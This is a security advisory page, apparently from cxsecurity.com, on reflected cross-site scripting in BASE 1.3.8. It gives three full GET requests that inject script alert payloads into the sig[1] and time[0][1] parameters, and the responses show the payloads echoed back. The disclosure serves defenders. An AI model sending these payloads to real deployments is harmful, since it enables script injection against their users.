Basic Analysis and_security engine 1.3.8 XSS

2010-05-06 / 2010-05-07
Credit: none
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

=== XSS Reflective === There are 3 pages that have Reflective XSS. /base/base_qry_main.php /base/base_stat_alerts.php /base/base_stat_uaddr.php === Example 1 ==== /base/base_qry_main.php the value of sig[1] is not being validated. === Request === GET /base/base_qry_main.php?search=1&sensor=+&ag=+&sig%5B0%5D=+&sig%5B2%5D=%3D&sig%5B1%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sig_class=+&sig_priority%5B0%5D=+&sig_priority%5B1%5D=&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=+&time%5B0%5D%5B2%5D=+&time%5B0%5D%5B3%5D=&time%5B0%5D%5B4%5D=+&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+&submit=ADD+TIME&ip_addr%5B0%5D%5B0%5D=+&ip_addr%5B0%5D%5B1%5D=+&ip_addr%5B0%5D%5B2%5D=%3D&ip_addr%5B0%5D%5B3%5D=&ip_addr%5B0%5D%5B8%5D=+&ip_addr%5B0%5D%5B9%5D=+&ip_field%5B0%5D%5B0%5D=+&ip_field%5B0%5D%5B1%5D=+&ip_field%5B0%5D%5B2%5D=%3D&ip_field%5B0%5D%5B3%5D=&ip_field%5B0%5D%5B4%5D=+&ip_field%5B0%5D%5B5%5D=+&data_encode%5B0%5D=+&data_encode%5B1%5D=+&data%5B0%5D%5B0%5D=+&data%5B0%5D%5B1%5D=+&data%5B0%5D%5B2%5D=&data%5B0%5D%5B3%5D=+&data%5B0%5D%5B4%5D=+&new=1&sort_order=none&caller=&num_result_rows=-1&current_view=-1 HTTP/1.1 Host: 172.16.105.130 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://172.16.105.130/base/base_qry_main.php?new=1 Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2 === Response === ...snip... <INPUT TYPE="text" NAME="sig[1]" SIZE=40 VALUE=""><script>alert("XSS")</script>"><BR><B>Classification: </B><SELECT NAME="sig_class"> ...snip... ==================================================================================================================================================== === Example 2 === /base/base_stat_alerts.php the value of time[0][1] is not being validated. === Request === GET /base/base_stat_alerts.php?time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3D5c9f2<script>alert(1)</script>f0d91eba175&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1 Host: 172.16.105.131 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347; === Response === ...snip... <TD><CODE> time >=5c9f2<script>alert(1)</script>f0d91eba175 [ 05 / 22 / 2009 ] [ </CODE> ..snip... ==================================================================================================================================================== === Example 3 === /base/base_stat_uaddr.php the value of time[0][1] is not being validated. === Request === GET /base/base_stat_uaddr.php?addr_type=2&sort_order=occur_d&time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3Dd5c9d<script>alert(1)</script>4e48bef68b4&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1 Host: 172.16.105.131 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347; === Response === ...snip... <TD><CODE> time >=d5c9d<script>alert(1)</script>4e48bef68b4 [ 05 / 22 / 2009 ] [ </CODE> ...snip...

References:

http://spl0it.org/files/BASE-XSS/Reflective-notes.txt
http://secureideas.cvs.sourceforge.net/viewvc/secureideas/base-php4/base_ag_common.php?sortby=date&view
http://secunia.com/advisories/35222
http://base.secureideas.net/news.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top